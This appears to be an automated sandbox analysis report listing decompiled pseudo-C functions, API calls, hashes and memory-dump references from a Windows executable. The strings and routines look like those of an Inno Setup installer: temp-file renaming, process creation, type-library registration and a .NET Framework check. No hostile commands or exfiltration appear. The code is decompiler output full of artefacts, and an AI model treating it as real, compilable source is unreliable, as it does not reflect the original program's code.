                                                                    • Instruction ID: f6f51fa323c2004b4ed4a12cf3aa4c02228d8e81e9c13bd86265522dc6499af0
                                                                    • Opcode Fuzzy Hash: ad8bebb6b70c684c30d9747228a5e3f8ffc0963a0edfe972ae4d2d3d4fc87c04
                                                                    • Instruction Fuzzy Hash: B01172A160425956FF706A7A6F09BEA3F9C7FD1745F050429BE419B283CB38CC458BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B631C, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E005B631C() {
				intOrPtr _v4;
				void* _v8;
				int _t5;
				void* _t6;
				intOrPtr _t12;
				struct HHOOK__* _t14;
				void* _t19;
				void* _t20;

				if( *0x6d57c0 != 0) {
					_t14 =  *0x6d57c0; // 0x0
					UnhookWindowsHookEx(_t14);
				}
				 *0x6d57c0 = 0;
				_v4 = 0x6d57c4;
				_t5 = 0;
				asm("lock xchg [edx], eax");
				_v8 = 0;
				if(_v8 != 0) {
					_t6 =  *0x6d57bc; // 0x0
					SetEvent(_t6);
					if(GetCurrentThreadId() !=  *0x6d57b8) {
						while(MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff) != 0) {
							_t12 =  *0x6d579c; // 0x0
							E005B871C(_t12, _t19, _t20);
						}
					}
					_t5 = CloseHandle(_v8);
				}
				return _t5;
			}











                                                                    0x005b6326
                                                                    0x005b6328
                                                                    0x005b632e
                                                                    0x005b632e
                                                                    0x005b6335
                                                                    0x005b633a
                                                                    0x005b6346
                                                                    0x005b6348
                                                                    0x005b634b
                                                                    0x005b6352
                                                                    0x005b6354
                                                                    0x005b635a
                                                                    0x005b636a
                                                                    0x005b6378
                                                                    0x005b636e
                                                                    0x005b6373
                                                                    0x005b6373
                                                                    0x005b6378
                                                                    0x005b6395
                                                                    0x005b6395
                                                                    0x005b639c

                                                                    APIs
                                                                    • UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
                                                                    • SetEvent.KERNEL32(00000000), ref: 005B635A
                                                                    • GetCurrentThreadId.KERNEL32 ref: 005B635F
                                                                    • MsgWaitForMultipleObjects.USER32 ref: 005B6388
                                                                    • CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
                                                                    • String ID:
                                                                    • API String ID: 2132507429-0
                                                                    • Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                                    • Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
                                                                    • Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
                                                                    • Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B8F64, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 84%
                                                                    			E006B8F64(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				WCHAR* _t43;
				char _t58;
				intOrPtr _t68;
				void* _t72;
				signed int _t74;
				void* _t78;

				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = __edx;
				_v16 = __eax;
				_push(_t78);
				_push(0x6b9062);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xffffffe4;
				E0040A1C8(_v20);
				E005C5428(_v16, 0,  &_v8);
				_t72 = 0;
				_t58 = 0;
				do {
					_v32 = _t58;
					_v28 = 0;
					E004244F8(L"isRS-%.3u.tmp", 0,  &_v32,  &_v24);
					E0040B4C8( &_v12, _v24, _v8);
					_t74 = GetFileAttributesW(E0040B278(_v12));
					if(_t74 == 0xffffffff) {
						L5:
						_t43 = E0040B278(_v12);
						if(MoveFileExW(E0040B278(_v16), _t43, 1) == 0) {
							_t72 = _t72 + 1;
							if(_t72 == 0xa) {
								break;
							}
							goto L8;
						}
						E0040A5A8(_v20, _v12);
						break;
					}
					if((_t74 & 0x00000010) != 0) {
						goto L8;
					}
					if((_t74 & 0x00000001) != 0) {
						SetFileAttributesW(E0040B278(_v12), _t74 & 0xfffffffe);
					}
					goto L5;
					L8:
					_t58 = _t58 + 1;
				} while (_t58 != 0x3e8);
				_pop(_t68);
				 *[fs:eax] = _t68;
				_push(E006B9069);
				E0040A1C8( &_v24);
				return E0040A228( &_v12, 2);
			}
















                                                                    0x006b8f6f
                                                                    0x006b8f72
                                                                    0x006b8f75
                                                                    0x006b8f78
                                                                    0x006b8f7b
                                                                    0x006b8f80
                                                                    0x006b8f81
                                                                    0x006b8f86
                                                                    0x006b8f89
                                                                    0x006b8f8f
                                                                    0x006b8f9a
                                                                    0x006b8f9f
                                                                    0x006b8fa1
                                                                    0x006b8fa3
                                                                    0x006b8fa7
                                                                    0x006b8faa
                                                                    0x006b8fb8
                                                                    0x006b8fc6
                                                                    0x006b8fd9
                                                                    0x006b8fde
                                                                    0x006b9002
                                                                    0x006b9007
                                                                    0x006b901d
                                                                    0x006b902c
                                                                    0x006b9030
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006b9030
                                                                    0x006b9025
                                                                    0x00000000
                                                                    0x006b9025
                                                                    0x006b8fe6
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x006b8fee
                                                                    0x006b8ffd
                                                                    0x006b8ffd
                                                                    0x00000000
                                                                    0x006b9032
                                                                    0x006b9032
                                                                    0x006b9033
                                                                    0x006b9041
                                                                    0x006b9044
                                                                    0x006b9047
                                                                    0x006b904f
                                                                    0x006b9061

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
                                                                    • MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$Attributes$Move
                                                                    • String ID: isRS-%.3u.tmp
                                                                    • API String ID: 3839737484-3657609586
                                                                    • Opcode ID: 8d4268528f0551a281f2f3f55997a38572bb3cbe4dffdc26fb30d28ba37c9b4b
                                                                    • Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
                                                                    • Opcode Fuzzy Hash: 8d4268528f0551a281f2f3f55997a38572bb3cbe4dffdc26fb30d28ba37c9b4b
                                                                    • Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060C038, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 63%
                                                                    			E0060C038(void* __eax, WCHAR* __ecx, WCHAR* __edx, void* __eflags, struct _PROCESS_INFORMATION* _a4, struct _STARTUPINFOW* _a8, char _a12, void* _a16, char _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, struct _SECURITY_ATTRIBUTES* _a32) {
				int _v8;
				char _v16;
				long _v20;
				intOrPtr _t42;
				void* _t50;
				void* _t52;
				intOrPtr _t53;

				_t50 = _t52;
				_t53 = _t52 + 0xfffffff0;
				if(E0060BF74(__eax,  &_v16) != 0) {
					_push(_t50);
					_push(0x60c0b2);
					_push( *[fs:eax]);
					 *[fs:eax] = _t53;
					_t5 =  &_a12; // 0x624d3e
					_t7 =  &_a20; // 0x624d58
					_v8 = CreateProcessW(__edx, __ecx, _a32, _a28, _a24,  *_t7, _a16,  *_t5, _a8, _a4);
					_v20 = GetLastError();
					_pop(_t42);
					 *[fs:eax] = _t42;
					_push(E0060C0B9);
					return E0060BFB0( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}










                                                                    0x0060c039
                                                                    0x0060c03b
                                                                    0x0060c053
                                                                    0x0060c05e
                                                                    0x0060c05f
                                                                    0x0060c064
                                                                    0x0060c067
                                                                    0x0060c072
                                                                    0x0060c07a
                                                                    0x0060c091
                                                                    0x0060c099
                                                                    0x0060c09e
                                                                    0x0060c0a1
                                                                    0x0060c0a4
                                                                    0x0060c0b1
                                                                    0x0060c055
                                                                    0x0060c057
                                                                    0x0060c0cb
                                                                    0x0060c0cb

                                                                    APIs
                                                                    • CreateProcessW.KERNEL32 ref: 0060C08C
                                                                    • GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateErrorLastProcess
                                                                    • String ID: >Mb$XMb
                                                                    • API String ID: 2919029540-2660256435
                                                                    • Opcode ID: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                                    • Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
                                                                    • Opcode Fuzzy Hash: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
                                                                    • Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 006B6998, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 55%
                                                                    			E006B6998(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				struct _STARTUPINFOW _v76;
				struct _PROCESS_INFORMATION _v92;
				int _t22;
				intOrPtr _t28;
				intOrPtr _t41;
				void* _t47;

				_v8 = 0;
				_t44 = __edx;
				_t32 = __eax;
				_push(_t47);
				_push(0x6b6a40);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47 + 0xffffffa8;
				_push(0x6b6a5c);
				_push(__eax);
				_push(E006B6A6C);
				_push(__edx);
				E0040B550( &_v8, __eax, 4, __edi, __edx);
				E00407760( &_v76, 0x44);
				_v76.cb = 0x44;
				_t22 = CreateProcessW(0, E0040B278(_v8), 0, 0, 0, 0, 0, 0,  &_v76,  &_v92);
				_t49 = _t22;
				if(_t22 == 0) {
					_t28 =  *0x6cded8; // 0x6d5c28
					_t8 = _t28 + 0x20c; // 0x0
					E006B68EC( *_t8, _t32, 0, _t44, _t49);
				}
				CloseHandle(_v92.hThread);
				_pop(_t41);
				 *[fs:eax] = _t41;
				_push(E006B6A47);
				return E0040A1C8( &_v8);
			}










                                                                    0x006b69a2
                                                                    0x006b69a5
                                                                    0x006b69a7
                                                                    0x006b69ab
                                                                    0x006b69ac
                                                                    0x006b69b1
                                                                    0x006b69b4
                                                                    0x006b69b7
                                                                    0x006b69bc
                                                                    0x006b69bd
                                                                    0x006b69c2
                                                                    0x006b69cb
                                                                    0x006b69da
                                                                    0x006b69df
                                                                    0x006b6a05
                                                                    0x006b6a0a
                                                                    0x006b6a0c
                                                                    0x006b6a0e
                                                                    0x006b6a13
                                                                    0x006b6a19
                                                                    0x006b6a19
                                                                    0x006b6a22
                                                                    0x006b6a2c
                                                                    0x006b6a2f
                                                                    0x006b6a32
                                                                    0x006b6a3f

                                                                    APIs
                                                                    • CreateProcessW.KERNEL32 ref: 006B6A05
                                                                    • CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22
                                                                      • Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCreateErrorHandleLastProcess
                                                                    • String ID: (\m$D
                                                                    • API String ID: 3798668922-1981685662
                                                                    • Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                                    • Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
                                                                    • Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
                                                                    • Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0062460C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 48%
                                                                    			E0062460C(void* __eax, void* __ebx, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				void* _t19;
				char _t20;
				void* _t34;
				intOrPtr _t39;
				intOrPtr _t45;

				_t42 = __esi;
				_push(0);
				_push(0);
				_push(0);
				_push(_t45);
				_push(0x6246a6);
				 *[fs:eax] = _t45;
				E005C52C8(__eax,  &_v16, _t45,  *[fs:eax]);
				E0040B368( &_v8, _v16);
				_push(E0040EC28( &_v12));
				_t19 = E0040AEF4(_v8);
				_t34 = _t19;
				_push(_t34);
				L0043C244();
				if(_t19 != 0) {
					E0060CE98(L"LoadTypeLib", _t34, _t19, __esi);
				}
				_push(0);
				_push(_t34);
				_t20 = _v12;
				_push(_t20);
				L0043C24C();
				if(_t20 != 0) {
					E0060CE98(L"RegisterTypeLib", _t34, _t20, _t42);
				}
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E006246AD);
				E0040A1C8( &_v16);
				E0040EC28( &_v12);
				return E0040A210( &_v8);
			}











                                                                    0x0062460c
                                                                    0x0062460f
                                                                    0x00624611
                                                                    0x00624613
                                                                    0x0062461a
                                                                    0x0062461b
                                                                    0x00624623
                                                                    0x0062462b
                                                                    0x00624636
                                                                    0x00624643
                                                                    0x00624647
                                                                    0x0062464c
                                                                    0x0062464e
                                                                    0x0062464f
                                                                    0x00624656
                                                                    0x0062465f
                                                                    0x0062465f
                                                                    0x00624664
                                                                    0x00624666
                                                                    0x00624667
                                                                    0x0062466a
                                                                    0x0062466b
                                                                    0x00624672
                                                                    0x0062467b
                                                                    0x0062467b
                                                                    0x00624682
                                                                    0x00624685
                                                                    0x00624688
                                                                    0x00624690
                                                                    0x00624698
                                                                    0x006246a5

                                                                    APIs
                                                                      • Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9
                                                                    • LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
                                                                    • RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Type$FullLoadNamePathRegister
                                                                    • String ID: LoadTypeLib$RegisterTypeLib
                                                                    • API String ID: 4170313675-2435364021
                                                                    • Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                                    • Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
                                                                    • Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
                                                                    • Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0060DAE9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E0060DAE9(void* __edx) {
				WCHAR* _t13;
				intOrPtr _t32;
				intOrPtr _t33;
				void* _t36;

				SetFileAttributesW(E0040B278( *((intOrPtr*)(_t36 - 0x10))), 0x20);
				if(E00423A20( *((intOrPtr*)(_t36 - 0x10))) == 0) {
					E0060CE84(L"DeleteFile");
				}
				_t13 = E0040B278( *((intOrPtr*)(_t36 - 0x10)));
				if(MoveFileW(E0040B278( *((intOrPtr*)(_t36 - 0x14))), _t13) == 0) {
					E0060CE84(L"MoveFile");
				}
				_pop(_t32);
				 *[fs:eax] = _t32;
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(E0060DBD9);
				E0040A228(_t36 - 0x44, 7);
				return E0040A228(_t36 - 0x1c, 7);
			}







                                                                    0x0060daf4
                                                                    0x0060db03
                                                                    0x0060db0a
                                                                    0x0060db0a
                                                                    0x0060db12
                                                                    0x0060db28
                                                                    0x0060db2f
                                                                    0x0060db2f
                                                                    0x0060db36
                                                                    0x0060db39
                                                                    0x0060dbac
                                                                    0x0060dbaf
                                                                    0x0060dbb2
                                                                    0x0060dbbf
                                                                    0x0060dbd1

                                                                    APIs
                                                                    • SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4
                                                                      • Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
                                                                      • Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
                                                                      • Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
                                                                      • Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
                                                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21
                                                                      • Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
                                                                    • String ID: DeleteFile$MoveFile
                                                                    • API String ID: 3947864702-139070271
                                                                    • Opcode ID: 69906e1fa498f448b67ec90ed8193f3809713f06cd0179ef74a02e782715ba36
                                                                    • Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
                                                                    • Opcode Fuzzy Hash: 69906e1fa498f448b67ec90ed8193f3809713f06cd0179ef74a02e782715ba36
                                                                    • Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00626F48, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39registryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00626F48(signed int __eax, void* __ecx, void* __edx, void* __ebp) {
				void* _v16;
				void* __ebx;
				void* _t31;
				signed int _t33;

				_push(__ecx);
				_t31 = __edx;
				_t22 = __eax;
				_t33 = __eax & 0x0000007f;
				if( *((intOrPtr*)(0x6d6374 + _t33 * 4)) == 0) {
					if(E005C7A14(__eax, L"SOFTWARE\\Microsoft\\.NETFramework", 0x80000002,  &_v16, 1, 0) == 0) {
						E005C793C();
						RegCloseKey(_v16);
					}
					if( *((intOrPtr*)(0x6d6374 + _t33 * 4)) == 0) {
						E0060CD28(L".NET Framework not found", _t22);
					}
				}
				return E0040A5A8(_t31,  *((intOrPtr*)(0x6d6374 + _t33 * 4)));
			}







                                                                    0x00626f4b
                                                                    0x00626f4c
                                                                    0x00626f4e
                                                                    0x00626f52
                                                                    0x00626f5d
                                                                    0x00626f7b
                                                                    0x00626f8c
                                                                    0x00626f95
                                                                    0x00626f95
                                                                    0x00626fa2
                                                                    0x00626fa9
                                                                    0x00626fa9
                                                                    0x00626fa2
                                                                    0x00626fc0

                                                                    APIs
                                                                      • Part of subcall function 005C7A14: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,005C80EE,?,00000000,?,005C808E,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C7A30
                                                                    • RegCloseKey.ADVAPI32(00000000,?,00000001,00000000,00000003,00626DA0,00000003,00000000,006270EB,00000000,006272A5,?,00626DA0,?,00000000,00000000), ref: 00626F95
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000E.00000002.334080085.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000E.00000002.334059347.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335728201.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335745535.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335757489.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335770966.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335778403.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335786260.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335795571.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335802546.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335808234.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000E.00000002.335816126.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseOpen
                                                                    • String ID: .NET Framework not found$InstallRoot$SOFTWARE\Microsoft\.NETFramework
                                                                    • API String ID: 47109696-2631785700
                                                                    • Opcode ID: cda95d6e92defb5476691493b7d59d62c1fa9335c75e1bc5c16bb959f18c3f17
